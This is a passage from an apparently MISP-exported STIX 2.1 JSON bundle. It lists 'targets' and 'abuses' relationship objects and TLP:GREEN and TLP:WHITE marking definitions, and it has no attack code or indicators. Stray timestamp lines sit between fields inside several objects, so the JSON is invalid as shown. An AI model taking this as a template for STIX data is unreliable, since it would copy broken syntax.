"target_ref" : "x-misp-attribute--5cdd63dc-b678-4fae-bd00-4390950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--8f1006c9-baa3-4c34-8910-f15fd53a3d36" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd63dc-29ec-42c0-936b-4d9d950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--35422291-d92b-4209-b8ae-9f15fc0d970f" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "abuses" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2023-12-14 14:30:15 +00:00
"id" : "relationship--632e5af4-77bc-4f2d-929c-11fd92709d47" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-05-24T09:55:23.000Z" ,
"modified" : "2021-05-24T09:55:23.000Z" ,
"relationship_type" : "targets" ,
"source_ref" : "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"target_ref" : "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:GREEN" ,
"definition" : {
"tlp" : "green"
}
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}